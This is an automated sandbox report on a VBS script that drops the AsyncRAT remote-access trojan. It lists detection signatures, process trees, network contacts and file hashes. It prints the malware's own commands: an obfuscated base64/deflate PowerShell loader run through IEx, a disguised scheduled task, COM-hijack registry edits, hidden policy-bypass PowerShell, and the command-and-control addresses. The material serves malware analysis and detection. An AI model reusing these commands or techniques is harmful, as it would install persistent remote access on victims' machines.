Malware Analysis Report

2024-11-30 19:25

Sample ID: 240923-t1x9kswfnd
Target: #9948-8465.vbs
SHA256: da6181e22c0c7230058044b36945666bd5cb6eef577eed273f217b166335e1b4
Tags: execution asyncrat sasa agilenet discovery persistence privilege_escalation rat
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: da6181e22c0c7230058044b36945666bd5cb6eef577eed273f217b166335e1b4

Threat Level: Known bad

The file #9948-8465.vbs was found to be: Known bad.

Malicious Activity Summary

execution asyncrat sasa agilenet discovery persistence privilege_escalation rat

AsyncRat

Async RAT payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Event Triggered Execution: Component Object Model Hijacking

Checks computer location settings

Obfuscated with Agile.Net obfuscator

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Modifies registry key

Scheduled Task/Job: Scheduled Task

Suspicious use of SetWindowsHookEx

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-09-23 16:32

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-09-23 16:32

Reported: 2024-09-23 16:34

Platform: win7-20240708-en

Max time kernel: 119s

Max time network: 120s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\#9948-8465.vbs"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\#9948-8465.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $bwrdjyvaostknlmeqfzc = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('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'));powershell $bwrdjyvaostknlmeqfzc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::frombAse64sTriNG( 'zVpbbusgEN0KQv1IFKkbiKJ2H1FW0uu9lxhsA2YeZ4Dq3o9eYoaZM09g7I8ft/5bnHvcnPu4OHd17h5GaWKbPJ4s1fy69FbO77NLWHjZZx776Fasv95zcYHukjF7ZONbJTgtXKUUCEhJEVwuoeCfEV8PPSgtSEBvAQo818rQkZRaWcFLawFsuWPiQv/0N/92+vfPW1//TOhfYW14/v3mfw1EGR8fGK+/F79TReY53eLXuTyI/GuF5D++DkFRWHz+8kVgxaDz/vOyAQxCSijR92HZ61DCPwu5y+bBXfrOq0SxKp1mo/PfnKKE16ryVwk6Y3ZitS45gnp5RCslpg0VCnBt8RuvkkPSL3C459ZezhZIw6WICoKw+uEMq/I419ErJBzDMhkquAJZNEOntUoxNbdSSyXWs6x1ss5kSNlcHw5GxWayty0ieBX0wOIfJNoAqWAUaw1RymmtyLE2GULoAFhwnkOubyFuxMSsWBLqU5WIbBGg83uMKmDc0drYQCjrKcYd1AsIRbauy9UbM9UmElBEbyISG5iXnD6KzMksos7tMfsMuNUKOsLx2TSEygxSJFKZO6osV0UZckRvMIvb1YmJOR+aQ8TqbYydadZYxRkMSS+1flIQKzKJy0b1sVcCmjjb2SV1MJcDAd60AgkkQ41AsgSa8a6nMXMrKZCyrkxWNTp6x4D3GPQ0Zb/fHRnYaTEJj+A4JVzRvycYCkIo13ZsvQUS1KNBZqh0fZYrgpqsLdBltSkCO9WC3kNiHWWNHmHAFsD/eIyBSpVwkBnYF+RyG5GnDgPOHPGPxX1VfoJlCr29mq5DwPUTOlUmo0HoAS9heQ13yKT62QYsbTJQ7HP2/qMWfFMJmaAe9rlijBmGnPpEYAoK3HzVc3Xw9766yATKPVQstixteKouoy2+7qNnZ7lWGJdGz92Yp3RQt6EmBEj/GKoO1EUzmX2KczV7cfFL0wOx3rb2v6PuFsJhjUPCDdX0to3cFn3DSiTeo9BeBmRqMDJPw/FpWG2QsG9UYdrZYDh0NyawWGnQ0Biz+828as9gLNZJajjojUHHO7TmUG+kKRdtpnKz1+xRuiVC5oot90hoHfpU0JlLXCPHlS70TbtjHE053Ik3WfwunP33F6dmQIThYwjDKYN8EQ3cUHgy5GsGqLp2vtuih2Bv1/g1DFMwoJCEN+ABtJRjuU1r54eGNPJucXZDqveIXeXelO+TqqKKYurIqfFuEGRN+kxREfxiKHS8FeAqA8WDwWn/0oLVFIBCI4GKeR0y4LUQ4q/rQ/DzcST0Z61vws80kXNfY7Gin/JNbLm645WzUAJKBrZvbirlmOm4HjxTA7V2RG+xkA0ftk/z9oZgTZNC18yOTcfzsPd9IFW4zwEBHl/gEmjtLMLJVHL7d5AFAN658OCzePYL' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | www1.coulmandental.com | udp
US | 34.192.83.212:443 | www1.coulmandental.com | tcp
US | 34.192.83.212:443 | www1.coulmandental.com | tcp

Files

memory/1928-4-0x000007FEF600E000-0x000007FEF600F000-memory.dmp

memory/1928-8-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

memory/1928-7-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

memory/1928-6-0x0000000001D90000-0x0000000001D98000-memory.dmp

memory/1928-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

memory/1928-9-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 cf67f54747f6115a33ccd24e5ca67024
SHA1 f8a204b8e2c5da2f9491c53ffe81964a44801845
SHA256 b3dff38da8b6b9a0004bf8ad869b379e91e855c504fec7c9ae393dd930d9d033
SHA512 7514323ee20709664e81dcf9c932728bcea4d1ef0fc0dbb93f712e3b31c63299d9d4441adb3e2848cd8d3996b7198ec8ac83dda826d02a35e84cc09a92a588f1

memory/1928-10-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

memory/1928-12-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

memory/1928-17-0x000007FEF600E000-0x000007FEF600F000-memory.dmp

memory/1928-18-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

memory/1928-19-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-09-23 16:32

Reported: 2024-09-23 16:34

Platform: win10v2004-20240802-en

Max time kernel: 140s

Max time network: 151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\#9948-8465.vbs"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Obfuscated with Agile.Net obfuscator

agilenet
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\RedroCrypt.dll" | C:\Windows\system32\reg.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4556 wrote to memory of 4056 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 4056 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4056 wrote to memory of 4840 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4056 wrote to memory of 4840 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4840 wrote to memory of 2304 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe
PID 4840 wrote to memory of 2304 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe
PID 1848 wrote to memory of 1892 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 1848 wrote to memory of 1892 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 1892 wrote to memory of 4652 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 1892 wrote to memory of 4652 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 1892 wrote to memory of 1416 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 1892 wrote to memory of 1416 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\reg.exe
PID 1892 wrote to memory of 624 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 624 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe
PID 624 wrote to memory of 744 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 624 wrote to memory of 744 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 744 wrote to memory of 1816 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 744 wrote to memory of 1816 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 744 wrote to memory of 1816 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 744 wrote to memory of 1816 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\#9948-8465.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $bwrdjyvaostknlmeqfzc = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('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'));powershell $bwrdjyvaostknlmeqfzc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::frombAse64sTriNG( 'zVpbbusgEN0KQv1IFKkbiKJ2H1FW0uu9lxhsA2YeZ4Dq3o9eYoaZM09g7I8ft/5bnHvcnPu4OHd17h5GaWKbPJ4s1fy69FbO77NLWHjZZx776Fasv95zcYHukjF7ZONbJTgtXKUUCEhJEVwuoeCfEV8PPSgtSEBvAQo818rQkZRaWcFLawFsuWPiQv/0N/92+vfPW1//TOhfYW14/v3mfw1EGR8fGK+/F79TReY53eLXuTyI/GuF5D++DkFRWHz+8kVgxaDz/vOyAQxCSijR92HZ61DCPwu5y+bBXfrOq0SxKp1mo/PfnKKE16ryVwk6Y3ZitS45gnp5RCslpg0VCnBt8RuvkkPSL3C459ZezhZIw6WICoKw+uEMq/I419ErJBzDMhkquAJZNEOntUoxNbdSSyXWs6x1ss5kSNlcHw5GxWayty0ieBX0wOIfJNoAqWAUaw1RymmtyLE2GULoAFhwnkOubyFuxMSsWBLqU5WIbBGg83uMKmDc0drYQCjrKcYd1AsIRbauy9UbM9UmElBEbyISG5iXnD6KzMksos7tMfsMuNUKOsLx2TSEygxSJFKZO6osV0UZckRvMIvb1YmJOR+aQ8TqbYydadZYxRkMSS+1flIQKzKJy0b1sVcCmjjb2SV1MJcDAd60AgkkQ41AsgSa8a6nMXMrKZCyrkxWNTp6x4D3GPQ0Zb/fHRnYaTEJj+A4JVzRvycYCkIo13ZsvQUS1KNBZqh0fZYrgpqsLdBltSkCO9WC3kNiHWWNHmHAFsD/eIyBSpVwkBnYF+RyG5GnDgPOHPGPxX1VfoJlCr29mq5DwPUTOlUmo0HoAS9heQ13yKT62QYsbTJQ7HP2/qMWfFMJmaAe9rlijBmGnPpEYAoK3HzVc3Xw9766yATKPVQstixteKouoy2+7qNnZ7lWGJdGz92Yp3RQt6EmBEj/GKoO1EUzmX2KczV7cfFL0wOx3rb2v6PuFsJhjUPCDdX0to3cFn3DSiTeo9BeBmRqMDJPw/FpWG2QsG9UYdrZYDh0NyawWGnQ0Biz+828as9gLNZJajjojUHHO7TmUG+kKRdtpnKz1+xRuiVC5oot90hoHfpU0JlLXCPHlS70TbtjHE053Ik3WfwunP33F6dmQIThYwjDKYN8EQ3cUHgy5GsGqLp2vtuih2Bv1/g1DFMwoJCEN+ABtJRjuU1r54eGNPJucXZDqveIXeXelO+TqqKKYurIqfFuEGRN+kxREfxiKHS8FeAqA8WDwWn/0oLVFIBCI4GKeR0y4LUQ4q/rQ/DzcST0Z61vws80kXNfY7Gin/JNbLm645WzUAJKBrZvbirlmOm4HjxTA7V2RG+xkA0ftk/z9oZgTZNC18yOTcfzsPd9IFW4zwEBHl/gEmjtLMLJVHL7d5AFAN658OCzePYL' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat

C:\Windows\system32\reg.exe

REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f

C:\Windows\system32\reg.exe

REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f

C:\Windows\system32\cmd.exe

cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe

"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp
US | 8.8.8.8:53 | www1.coulmandental.com | udp
US | 34.192.83.212:443 | www1.coulmandental.com | tcp
US | 8.8.8.8:53 | 212.83.192.34.in-addr.arpa | udp
US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp
US | 8.8.8.8:53 | 35.56.20.217.in-addr.arpa | udp
US | 8.8.8.8:53 | 240.143.123.92.in-addr.arpa | udp
US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp
US | 88.119.175.153:5555 | | tcp
US | 8.8.8.8:53 | 153.175.119.88.in-addr.arpa | udp
US | 88.119.175.153:8808 | | tcp

Files

memory/4056-0-0x00007FF89DB63000-0x00007FF89DB65000-memory.dmp

memory/4056-1-0x0000024F99C30000-0x0000024F99C52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l0mtfbmy.v4c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4056-11-0x00007FF89DB60000-0x00007FF89E621000-memory.dmp

memory/4056-12-0x00007FF89DB60000-0x00007FF89E621000-memory.dmp

memory/4056-22-0x00007FF89DB63000-0x00007FF89DB65000-memory.dmp

memory/4056-23-0x00007FF89DB60000-0x00007FF89E621000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0ff7e1af4cc86e108eef582452b35523
SHA1 c2ccf2811d56c3a3a58dced2b07f95076c6b5b96
SHA256 62ed8ef2250f9f744852cb67df0286c80f94e26aed646989b76e5b78f2f1f0d0
SHA512 374675fd36cd8bc38acaec44d4cc855b85feece548d99616496d498e61e943fd695fec7c57550a58a32455e8b21b41bafa18cd1dadac69676fff1de1a56da937

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8d089c855358969266a3275f0ec4f955
SHA1 5ce30b598cfa0c2008541b1b549673401971dc3d
SHA256 e198883dc78657f44bae11e2de5f56bc0f41eb6440f73cd3d65c30878b858734
SHA512 f240dcfc7adcca3140cdc2f8f387ac2053a7fd6e5e474a4008cf38d03506f99e361a5d6e970480ab1155ad00531b9d9095ed2a502ad09e7e442cdf7bcf932320

memory/4056-32-0x00007FF89DB60000-0x00007FF89E621000-memory.dmp

C:\ProgramData\Cloud\cloud.vbs

MD5 7079642a22a106d0ed6f227cc70899ae
SHA1 60dd57af3518c0ea4104379ad233b5982b231283
SHA256 b098e1055dc3dd3156236ee515e5dfbefd746d84578197f2309968625b831724
SHA512 ca1e9e201785fa611520ee2585208fb0684fd338ff1ab1d515523e03677ac4ac1ca5353fdc17bcba4c6c39aa37f9be182c5f7187b8dd9520c8604a001bd69f80

C:\ProgramData\Cloud\cloud.bat

MD5 b8bdfc7895feaaacba3711d17be6778a
SHA1 fa0bc12827b348fe540a13683897deb207650df7
SHA256 e209153dda335fec8fa021f1022c4f9fe041cb527c2b9068eb9ec911429f20a3
SHA512 ea91a8262eacba0bcd6f692b5141124d7fedc98507ad6ab71ade565b347fe328780221f6972cc5c98a9471662474bf8c93e1219d241ff5f90579f7f8e8dd5156

C:\ProgramData\Cloud\cloud.ps1

MD5 81fe8fe5684ecf16d936250bb94c852a
SHA1 a0a18d8d75e12546baa0b7dfd0dfb02dbefbac40
SHA256 ca0713d77d71359ff692385a2bb92e0b22fe7f0db9a356fd4ffbbfeb34911584
SHA512 d0a35efecc947e2e5d99d3f58a494693d5ebd48635f749f87f341e0a1ce965b7a413754a0316c973eebac4c8e8a12315a916adbc4350a0819132debde1ea7013

memory/744-46-0x000001B404780000-0x000001B40478E000-memory.dmp

memory/1816-47-0x0000000001210000-0x0000000001228000-memory.dmp

memory/1816-49-0x00000000031D0000-0x00000000031E6000-memory.dmp

memory/1816-50-0x0000000006140000-0x00000000066E4000-memory.dmp

memory/1816-51-0x0000000005D30000-0x0000000005DC2000-memory.dmp

memory/1816-52-0x0000000005D00000-0x0000000005D0A000-memory.dmp

memory/1816-53-0x0000000006AD0000-0x0000000006B6C000-memory.dmp

memory/1816-54-0x0000000006A30000-0x0000000006A96000-memory.dmp